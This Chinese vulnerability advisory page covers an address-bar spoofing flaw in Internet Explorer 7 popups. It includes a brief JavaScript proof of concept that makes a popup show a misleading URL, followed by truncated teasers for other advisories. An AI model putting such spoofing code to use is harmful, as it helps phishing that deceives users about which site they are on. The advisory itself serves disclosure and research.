IE7弹出窗口地址栏URI欺骗漏洞
所属分类:
网络安全 / 漏洞分析
阅读数:
140
收藏 0赞 0分享
受影响系统:
Microsoft Internet Explorer 7.0
描述:
BUGTRAQ ID: 28498
Internet Explorer是微软发布的非常流行的WEB浏览器。
如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。
<*来源:Juan Pablo Lopez Yacubian (jplopezy@gmail.com)
链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script language="JavaScript">
function iniciar()
{
nuevaventana = window.open("", "Win", "width=500,height=500,location=1");
nuevaventana.document.location = "http://www.google.com.ar/#" "www.microsoft.com/";
}
iniciar()
</script>
建议:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
2007年12月网络安全漏洞总结
声明:本十大安全漏洞由NSFOCUS安全小组根据安全漏洞的严重程度、影响范围等因素综合评出,仅供参考
1.2007-12-11 Microsoft消息队列服务栈溢出漏洞
综述:
Microsoft Windows是微软发布的非常流行的操
收藏 0赞 0分享
OmniPCX Enterprise存在远程命令注入漏洞
受影响系统:
Alcatel-Lucent OmniPCX Enterprise <= 7.1
不受影响系统:
Alcatel-Lucent OmniPCX Enterprise 7.1 patch F5.401.19
Alcatel-Luc
收藏 0赞 0分享
Sun Java jpiexp32.dll对象名称含空指针引用漏洞
受影响系统:
Sun JRE < 5.0 Update 14
不受影响系统:
Sun JRE 5.0 Update 14
描述:
Solaris系统的Java运行时环境(JRE)为JAVA应用程序提供可靠的运行环境。
JRE处理畸
收藏 0赞 0分享
InterBase和Firebird远程栈缓冲区溢出漏洞
受影响系统:
Borland InterBase WI-V8.1.0.257
Borland InterBase WI-V8.0.0.123
Borland InterBase WI-V7.5.1.80
Borland InterB
收藏 0赞 0分享
IE 存在document.open()方式地址欺骗漏洞
受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft
收藏 0赞 0分享
Microsoft IE onunload事件地址栏欺骗漏洞
受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Ex
收藏 0赞 0分享
F2blog XMLRPC 上传任意文件漏洞
刚从官方下载的最新版:F2blog-v1.2_build_03.01_full
存在漏洞文件:xmlrpc.php,
影响:可上传任意文件到服务器。
原理:get_http_raw_post_data()是获取最原始的传递过来的数据,也是说不会因为PHP环境的ma
收藏 0赞 0分享
FTP客户端目录遍历漏洞可向任意位置写文件
FFFTP是一款小型的FTP客户端软件。FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。
受影
收藏 0赞 0分享
